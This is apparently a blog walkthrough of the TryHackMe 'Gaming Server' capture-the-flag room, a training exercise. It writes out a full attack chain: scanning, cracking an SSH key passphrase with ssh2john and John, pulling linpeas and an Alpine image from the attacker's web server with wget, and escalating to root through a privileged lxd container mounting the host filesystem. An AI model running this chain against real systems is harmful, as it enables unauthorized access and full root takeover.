The skills to be tested and needed to solve this room are: nmap, GoBuster, lxd, privilege escalation, local web server, ssh2john, and John.
This room was released on 8/30/2020. The initial foothold to me was super easy, but I struggled with the privilege escalation in exploiting lxd. I was really excited because in one of the rooms (I don’t exactly remember which one it was), I got stuck in a rabbit hole trying to exploit lxd, but it was actually not exploitable on that particular machine. I was excited this time, because I know that lxd is the way to privesc and this will be the first for me. I got stuck in this room too because of a silly misspelling.
I also chose to mask part of the answers so you will have to do the steps I took and see how things work. I don’t want to take away this learning experience from you.
Shoutout to the room creator, @SuitGuy. You can access the room at https://tryhackme.com/room/gamingserver
I was assigned a victim IP address of 10.10.200.23 to attack. You will be assigned a different IP address, so double check your entries when following this walk-through.
The requirements to complete this room are:
- Scan the target machine using nmap. Type nmap -sC -sV -oA gaming 10.10.200.23
- -sC – to scan using the default nmap scripts
- -sV – to pull version information of open ports found during the scan
- -oA gaming – to save the results of the scan to a files named “gaming” and saved in three different formats (normal, XML, and grepable)
2. Check the webserver by opening a browser and type your target’s IP address. Then check the webpage’s source code by right-clicking the page and choose View Page Source.
- Scroll all the way down, and you will see a message at the end of the page. The message sounds like user john could be a web developer
3. Run GoBuster or your choice of web enumeration tool. Type gobuster dir -u http://10.10.200.23 -w /usr/share/wordlists/dirb/common.txt
- dir – to use directory/file brute-forcing mode
- -u – is the flag to tell gobuster that we are scanning a URL
- -w – is the flag to set the list of possible directory and file names
- Check all of them by appending the filename or directory name on the url
- Check what the contents of the files secretKey and dict.lst
4. Now that we have a private key, we have to convert it to a format where John the Ripper will be able to crack the passphrase to eventually login to SSH. To convert it a John The Ripper crackable file, we have to use ssh2john. Type python /usr/sharejohn/ssh2john.py id_rsa > gaming.txt
- id_rsa – is the private key we recovered from the secretKey file. I just renamed it to id_rsa
- gaming.txt – is the filename I chose as the output file after the conversion. You can use any filename
5. Let’s crack hash to obtain the SSH Private Key passphrase by using John the Ripper. Type /usr/sbin/john –wordlist=dict.lst gaming.txt
- –wordlist – to instruct John the Ripper to use your preferred wordlist. Here we are using the list of passwords we obtained from the uploads directory
- gaming.txt – is the hash we got from the SSH Private Key
6. Login through SSH using the SSH Private Key we found, the passphrase we cracked, and the username of john. Type ssh -i id_rsa email@example.com then enter the passphrase we recovered on step 5.
7. To find the location of the user flag. Type find / -name user.txt 2>/dev/null
8. Open the user.txt file by typing cat /home/john/user.txt
9. Check for any sudo privileges for user john by typing sudo -l
10. We have to enumerate more to find something to exploit to escalate our privilege. Use Linpeas.sh. You can download it here. Download linpeas.sh to your local attack machine (I am using kali). Then we will transfer linpeas.sh from our kali machine to our victim machine. Follow the steps below:
- Start a local web server on your attack machine. Make sure to start it inside the directory where the linpeas.sh is located. For me it is located in the /home/kali/TryHackMe/gaming directory. Start the web server by typing python -m http.server 8000
***please note that the command I used python3 -m http.server only works if you are using python3 on your attack machine. For python2 you have to use python -m SimpleHTTPServer***
- Once your web server is up, go to the target machine with user john logged in, and download linpeas.sh by typing wget http://Your_Attack_Machine_IP_Address:8000/linpeas.sh
***Make sure to match the port number from the port number you used when you started your web server, or else the download to the target machine will fail***
11. Change the permission so you can execute linpeas by typing chmod +x linpeas.sh
12. Run linpeas.sh to start enumerating by typing ./linpeas.sh
- We can see that lxd is highlighted by linpeas and if we check which groups user john is a member, type groups john
13. We are going to exploit lxd and use it to escalate our privilege to root. By doing a quick research, like googling “how to escalate privilege using lxd” This page caught my attention. I followed the steps on how to exploit linux containers.
14. Download the script to create Alpine linux images from this page. Make sure to move the downloaded file in to the directory where you have your local web server started so you don’t have to start the server again. Now, go to the victim machine to download the script. Type wget http://Your_Attack_Machine_IP_Address:8000/alpine-v3.12-x86_64-20200830_2003.tar.gz
15. Type lxc image import ./alpine-v3.12-x86_64-20200830.tar.gz –alias gaming
- –alias gaming – you can choose your own alias, I used gaming.
16. Now, check any available images on the victim machine. Type lxc image list
17. Create a container using the gaming image by typing lxc init gaming thm -c security.privileged=true
- lxc init – initialize container
- gaming – is the image we are using to create the container
- thm – is the name of the container
- security.privileged=true – we want the container to have a uid=0 which is also the uid of the root on the host machine
18. Map the path by typing lxc config device add thm gaming disk source=/ path=/mnt/root recursive=true
19. Start the container by typing lxc start thm
20. Execute a shell by typing lxc exec thm /bin/sh
21. Search for the root.txt file by typing find / -name “root.txt”
22. Open the file to retrieve the root flag by typing cat /mnt/root/root/root.txt
Hope you enjoyed it. Please don’t forget to subscribe to my blog!